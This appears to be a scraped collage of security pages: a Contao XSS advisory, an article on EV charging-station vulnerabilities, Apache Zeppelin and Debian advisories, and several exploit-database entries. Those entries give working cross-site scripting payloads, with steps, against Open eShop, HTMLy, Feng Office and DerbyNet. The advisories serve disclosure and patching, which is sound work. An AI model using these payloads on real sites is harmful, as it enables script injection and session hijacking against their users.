### Impact

Users can insert malicious code into file names when uploading files, which is then executed in tooltips and popups in the backend.

### Patches

Update to Contao 4.13.40 or Contao 5.3.4.

### Workarounds

Disable uploads for untrusted users.

### References

https://contao.org/en/security-advisories/cross-site-scripting-in-the-file-manager

### For more information

If you have any questions or comments about this advisory, open an issue in [contao/contao](https://github.com/contao/contao/issues/new/choose).

### Credits

Thanks to Alexander Wuttke for reporting this vulnerability.

**Package**

composer contao/core-bundle (Composer)

**Affected versions**

\>= 4.0.0, < 4.13.40

\>= 5.0.0-RC1, < 5.3.4

**Patched versions**

4.13.40

5.3.4

**Description**

**Impact**

Users can insert malicious code into file names when uploading files, which is then executed in tooltips and popups in the backend.

**Patches**

Update to Contao 4.13.40 or Contao 5.3.4.

**Workarounds**

Disable uploads for untrusted users.

**References**

https://contao.org/en/security-advisories/cross-site-scripting-in-the-file-manager

**For more information**

If you have any questions or comments about this advisory, open an issue in contao/contao.

**Credits**

Thanks to Alexander Wuttke for reporting this vulnerability.

**References**

*   GHSA-v24p-7p4j-qvvf
*   https://nvd.nist.gov/vuln/detail/CVE-2024-28190
*   contao/contao@878d28d
*   contao/contao@b794e14
*   https://contao.org/en/security-advisories/cross-site-scripting-in-the-file-manager

 leofeyer published to contao/contao

Apr 9, 2024

Published by the National Vulnerability Database

Apr 9, 2024

Published to the GitHub Advisory Database

Apr 9, 2024

Reviewed

Apr 9, 2024

Last updated

Apr 9, 2024

GHSA-v24p-7p4j-qvvf: Contao: Cross site scripting in the file manager

As more electric vehicles are sold, the risk to compromised charging stations looms large alongside the potential for major cybersecurity exploits.

Source: Rosemary Roberts via Alamy Stock Photo

The increasing popularity of electric vehicles (EVs) isn't just a favorite for gas-conscious consumers, but also for cybercriminals who focus on using EV charging stations to launch far-reaching attacks. This is because every charging point, whether inside a private garage or on a public parking lot, is online and running a variety of software that interacts with payment systems and the electric grid, along with storing driver identities. In other words, they are an Internet of Things (IoT) software sinkhole.

"As EV charging becomes more widespread, they will become appealing targets to more sophisticated hacking groups," says Hooman Shahidi, the CEO of EVPassport, a charging network provider. "Providers need to think of their products as critical infrastructure and a critical component of our national security." There are 2.5 million electric vehicles operating in the US, and more than half of them require plug-in chargers. Acknowledging their popularity, back in 2022, the UK mandated charging stations be built in all new residential construction.

Charging stations face significant cybersecurity risks. "Issues include unprotected Internet connectivity, insufficient authentication and encryption, absence of network segmentation, unmanaged energy assets, and more," wrote researchers from Check Point Software and SaiFlow, the latter a cybersecurity specialist in distributed energy solutions. Compromised stations could damage the power grid, for example, or result in stolen customer data. “Chargers have personal and payment information and run a variety of protocols that aren't typically recognized by traditional firewalls," says Check Point Software's Aaron Rose, who works in the office of the CTO.

The early stages of cyberattacks on charging stations began a few years ago, when one Russian station was attacked in February 2022 in response to the Ukraine war and three more were compromised in the United Kingdom in April 2022. Both situations were more cyber pranks that displayed rude messages on the screens of the units. Shell patched a vulnerability last year in one database that could have exposed millions of charging logs from across its EV charging network.

New vulnerabilities continue to plague charging stations. Two of them could lead to remote code execution and potential data theft, discovered by SaiFlow earlier this year. The exploits take advantage of weak authentication routines among the various software modules that are used in the stations, according to their research. Charging station vendor Enel X Way lists a variety of other data compromises involving vehicle ID numbers, as well as exploits that could gain remote access to the vehicle controls.

Elias Bou-Harb is a computer scientist with the Louisiana State University who has long studied charging station security. He has found almost every charging product has major vulnerabilities, including well-known attack methods such as SQL injection and cross-site scripting. "What is particularly alarming is that some well-known protective measures haven't been implemented by most of the vendors, and that few of them have taken steps to improve their security even after we identified these weaknesses."

**IoT Devices Remain Attractive Targets**

Certainly, threats from charging stations aren't the only IoT devices that are targets of opportunity for cyberattackers. And the stations are just one of a multitude of IoT devices where exploits continue to increase. The combination of numerous smaller vendors with poor security design and practice and numerous automated tools such as botnets to locate and compromise various devices makes all IoT devices easy targets for hackers. Data from the US Federal Communications Commission (FCC) increased since then.

But the charging stations do represent a complex — and therefore very rich and potentially exploitable — combination of elements that can go beyond smart TVs and smart speakers. For example, Check Point's Rose says that "chargers have similar risk profiles but present a different attack surface to other smart devices."

What this means is that the chargers run management software tools "in between the EV user and the car and between the charging station and the power grid and coordinate billing, authentication, and supplied power," Bou-Harb says. "And adding to this complexity, all of this is also deployed by the charging vendors in the cloud." His research has found that some of the software run by these stations has been exploited for years, "and that vendors haven't yet realized they have been compromised, let alone fixed the problems."

Enel X Way's blog post lists a comprehensive eight-point framework for charging stations that covers identity access, risk management, emergency response, and other factors. 

**In Regulators' Crosshairs**

Both the US and Europe are making regulatory steps to try to rein in charging stations, both public and private. The UK has had an anti-tampering law in effect since 2022 relevant to the home-based charging stations. This resulted in security improvements from several vendors, as recently reported. Wallbox, a charging station vendor, added extra security safeguards to its equipment to comply with these regulations, while other vendors have dropped out of European markets rather than improve their products. 

The EU has proposed new cybersecurity safeguards for electric grid operators and IoT vendors in its NIS2 directive last year that will take effect in October. It includes stricter breach reporting requirements and levies higher fines, among other items. 

Another proposal is to have the charging station industry self-certify their devices, like what Underwriters Laboratories does for various electronics. European automotive safety vendor Dekra proposed a public charging station certification program that it claims is an industry first. It offers three different levels that range from providing basic security services to penetration testing of the equipment. 

The US is lagging in these efforts. Last summer, the Biden administration proposed a cybersecurity labeling program for smart home devices. Dubbed the Cyber Trust Mark, it would be administered by the FCC, based on work developed by the National Institute of Standards and Technology. "The Cyber Trust Mark is a great idea," Check Point's Rose says. "But execution is going to be key. The mark must be updated and based on doing continuous testing of devices."

Last year, the National Institute of Standards and Technology (NIST) also proposed a series of recommendations for public charging stations to improve their cybersecurity. However, one key element of the NIST, Cyber Trust, and Dekra initiatives is that they are all voluntary. "The charging stations' guidelines are a positive development," Ravi Lingarkar, vice president of product management at Akitra, wrote on LinkedIn. "Without uniform cybersecurity standards, EV charging stations can become easy targets for hackers. It's like enabling anyone to bring their own device to the grid. Given the rapid expansion of the EV charging infrastructure, cybersecurity is at the forefront of many potential problems." 

Still, these efforts are early and incomplete. "The government regulations have come too late," Bou-Harb says. "The market is already saturated with various charging products. These vendors don't really care about the security of their devices, which is often more of an afterthought. It's time for the charging vendors to come together, admit there is a problem, and start working on solutions and sharing threat data."

One potential roadblock is that EV chargers are under the purview of multiple regulatory agencies, such as the departments of Transportation, Energy, and Homeland Security. Getting them all to work cooperatively isn't going to be easy. "No one is taking leadership," Bou-Harb says. 

"A simple step that the government could take now would be to require SOC2 pending for EV charging providers. We need to raise the bar," EVPassport's Shahidi says. The SOC2 standard focuses on security controls and privacy, among other items.  

**About the Author(s)**

Contributing Writer

David Strom is one of the leading experts on network and Internet technologies and has written and spoken extensively on topics such as cybersecurity, VOIP, convergence, email, cloud computing, network management, Internet applications, wireless and Web services for more than 35 years. He was the editor-in-chief of Network Computing print, Digital Landing.com, and Tom's Hardware.com. He has written two computer networking books and appeared on a number of TV and radio shows explaining technology concepts and trends. He regularly blogs at https://blog.strom.com, and is president of David Strom Inc.

EV Charging Stations Still Riddled With Cybersecurity Vulnerabilities

Improper Encoding or Escaping of Output vulnerability in Apache Zeppelin.

Attackers can modify `helium.json` and perform cross-site scripting attacks on normal users. This issue affects Apache Zeppelin: from 0.8.2 before 0.11.1.

Users are recommended to upgrade to version 0.11.1, which fixes the issue.



Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-31868

**Apache Zeppelin vulnerable to cross-site scripting in the helium module**

Moderate severity GitHub Reviewed Published Apr 9, 2024 to the GitHub Advisory Database • Updated Apr 11, 2024

**Package**

maven org.apache.zeppelin:zeppelin-interpreter (Maven)

**Affected versions**

\>= 0.8.2, < 0.11.1

**Description**

Published to the GitHub Advisory Database

Apr 9, 2024

Last updated

Apr 11, 2024

GHSA-rrvf-5w4r-3x7v: Apache Zeppelin vulnerable to cross-site scripting in the helium module

Open eShop version 2.7.0 suffers from a cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: Open eShop Version : 2.7.0  - Reflected XSS# Exploit Author: tmrswrr # Vendor Homepage: http://www.open-eshop.com/# Version : 2.7.0# Date : 04/08/20241 ) Go to home page https://127.0.0.1/Open_eShop2 ) Write url this payload : test.html"><img src=x onerrora=confirm() onerror=confirm(1)>3 ) After save it you will be see xss alerthttps://127.0.0.1/Open_eShop/test.html"><img src=x onerrora=confirm() onerror=confirm(1)>

Open eShop 2.7.0 Cross Site Scripting

HTMLy version 2.9.6 suffers from a persistent cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: HTMLy Version : 2.9.6  - Stored XSS# Exploit Author: tmrswrr # Vendor Homepage: https://www.htmly.com/# Version 3.10.8.21 # Date : 04/08/20241 ) Login admin https://127.0.0.1/HTMLy/admin/config2 ) General Setting > Blog title >  "><img src=x onerrora=confirm() onerror=confirm(1)> 3 ) After save it you will be see xss alert

HTMLy 2.9.6 Cross Site Scripting

Debian Linux Security Advisory 5655-1 - It was discovered that Cockpit, a web console for Linux servers, was susceptible to arbitrary command execution if an administrative user was tricked into opening an sosreport file with a malformed filename.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5655-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffApril 04, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : cockpitCVE ID         : CVE-2024-2947It was discovered that Cockpit, a web console for Linux servers, wassusceptible to arbitrary command execution if an administrative userwas tricked into opening an sosreport file with a malformed filename.For the stable distribution (bookworm), this problem has been fixed inversion 287.1-0+deb12u1.We recommend that you upgrade your cockpit packages.For the detailed security status of cockpit please refer toits security tracker page at:https://security-tracker.debian.org/tracker/cockpitFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmYO+CkACgkQEMKTtsN8Tjah6w/+KMkDnUZXuYjUaF6XZLi05PEH8S60u4MYNu0kDIgNAaxfOvwJC9FiIOXfBWDA8q3GofBgAozeHpBIr/c654yn8mCu8/w6eX/j4eDK+5Obj+BGUBvBNxOt2hZK7rPmv7Dklz0mF0yFqGG9f+/MOT3HZU4tN4CZK37kbFUBvIbgf1X3vWVbJrdWBn/6yI6O7bogx4B0eG233Yc7jnSNTU6V2PfD9Eo8PpxwUnLB6ybgfhcgjmxbyTRp8UwKgfvon2XDI1BpcO7EJUf1XssNm7E7LdH8ZgWclOL7mHLym4nL9vOAPHY5ST1wfGlweTuvIYda/lOUc2Tu5K/r5YaWczVfNG4hhIAOAtJfHOAbog1+pJ73Ic4MPDCPkMyV994xEwyyFo5a1xJl5+BGnXjAuEQDJ8Jf7W9axI9TNqmsQusEt77jr17o0gDiX9JGidXh60sPLMoXO/SvzzI7Yw6SGOMBdu+q1QzoXezPa8ZU14ihXswbM/m01J8pg9abxA8RHVsyHMfF8L6YYbTLIqpMzhpDsxEeHF7MDvbMAMwKPLOM3nxZe4eC9/7glrHS5VHlWzpJ+V8H/ndCvCkkAKDTEEAxQEmrVDXJxP5hzRM4BtX4TlzAFWZDF/aw8CLw71x/Ene8Kp7SaNfNZfBhv9D2LZ95Eec38bFQoNT6+fphei3xv6M==cD4W-----END PGP SIGNATURE-----

Debian Security Advisory 5655-1

Feng Office version 3.10.8.21 suffers from a persistent cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: Feng Office version 3.10.8.21  - Stored XSS# Exploit Author: tmrswrr # Vendor Homepage: https://www.fengoffice.com/# version 3.10.8.21 1 ) Login admin https://127.0.0.1/Feng_Office/index.php?c=access&a=index#2 ) Click Tasks > "><img src=x onerrora=confirm() onerror=confirm(1)> add task 3 ) Click Add worked hours you will be see xss alert

Feng Office 3.10.8.21 Cross Site Scripting

DerbyNet version 9.0 suffers from a cross site scripting vulnerability in playlist.php.

    CVE ID: CVE-2024-30929Description:A Cross-Site Scripting (XSS) vulnerability has been found in DerbyNet version 9.0, affecting the `playlist.php` component. This issue allows remote attackers to execute arbitrary code by exploiting the `back` parameter. The application does not properly sanitize the `back` parameter before it is rendered on the page, thereby allowing the injection and execution of arbitrary JavaScript code.Vulnerability Type: Cross-Site Scripting (XSS)Vendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynetAffected Product Code Base: DerbyNet - v9.0Affected Component: playlist.phpAttack Type: RemoteImpact: Code executionAttack Vectors:The vulnerability can be exploited by crafting a URL that includes malicious JavaScript code as part of the `back` parameter. An example of such a URL is:- http://127.0.0.1:8000/playlist.php?back="><script>alert(1)</script>This example demonstrates how an attacker could inject and execute JavaScript within the context of the webpage, leading to potential security risks such as session hijacking, phishing, or unauthorized actions performed on behalf of the user.Discoverer: Valentin LobsteinReferences:- Official website: http://derbynet.com- Source code on GitHub: https://github.com/jeffpiazza/derbynet

DerbyNet 9.0 playlist.php Cross Site Scripting

DerbyNet version 9.0 suffers from a cross site scripting vulnerability in racer-results.php.

CVE ID: CVE-2024-30927

Description:  
A Cross-Site Scripting (XSS) vulnerability is present in DerbyNet version 9.0, specifically within the `racer-results.php` component. This issue allows remote attackers to execute arbitrary code through the improper handling of the `racerid` parameter. The vulnerability is notably present within the HTML `<title>` tag, where the `racerid` parameter value is dynamically inserted directly into the page content without any sanitization or encoding.

Vulnerability Type: Cross-Site Scripting (XSS)

Vendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynet

Affected Product Code Base: DerbyNet - v9.0

Affected Component: racer-results.php

Attack Type: Remote

Impact: Code execution

Attack Vectors:  
The XSS vulnerability can be exploited by inserting malicious JavaScript code into the `racerid` parameter of the URL. For example:  
- `http://127.0.0.1:8000/racer-results.php?racerid=</title><script>alert(1)</script>`

This method demonstrates how an attacker could manipulate the `racerid` parameter to inject and execute arbitrary JavaScript within the context of a user's session.

Discoverer: Valentin Lobstein

References:  
- Official website: http://derbynet.com  
- Source code on GitHub: https://github.com/jeffpiazza/derbynet

DerbyNet 9.0 racer-results.php Cross Site Scripting

DerbyNet version 9.0 suffers from a cross site scripting vulnerability in inc/kiosks.inc.

CVE ID: CVE-2024-30926

Description:  
A Cross-Site Scripting (XSS) vulnerability has been identified in DerbyNet version 9.0, affecting the `./inc/kiosks.inc` component. This vulnerability permits remote attackers to execute arbitrary code by exploiting the `address_for_current_kiosk()` function. The issue stems from the improper sanitization of user-supplied input via the URL parameters `id` and `address`, which are directly utilized without validation. This oversight allows the execution of malicious JavaScript code through crafted URLs.

Vulnerability Type: Cross-Site Scripting (XSS)

Vendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynet

Affected Product Code Base: DerbyNet - v9.0

Affected Component: ./inc/kiosks.inc

Attack Type: Remote

Impact: Code execution

Attack Vectors:  
The vulnerability can be exploited by manipulating URL parameters to inject malicious scripts. Examples include:  
- `http://127.0.0.1:8000/kiosk.php?id=<script>alert(1)</script>`  
- `http://127.0.0.1:8000/kiosk.php?address=<script>alert(1)</script>`

These manipulations demonstrate how an attacker could leverage unsanitized input to execute arbitrary JavaScript in the context of a user's session.

Discoverer: Valentin Lobstein

References:  
- Official website: http://derbynet.com  
- Source code on GitHub: https://github.com/jeffpiazza/derbynet

Tag

#xss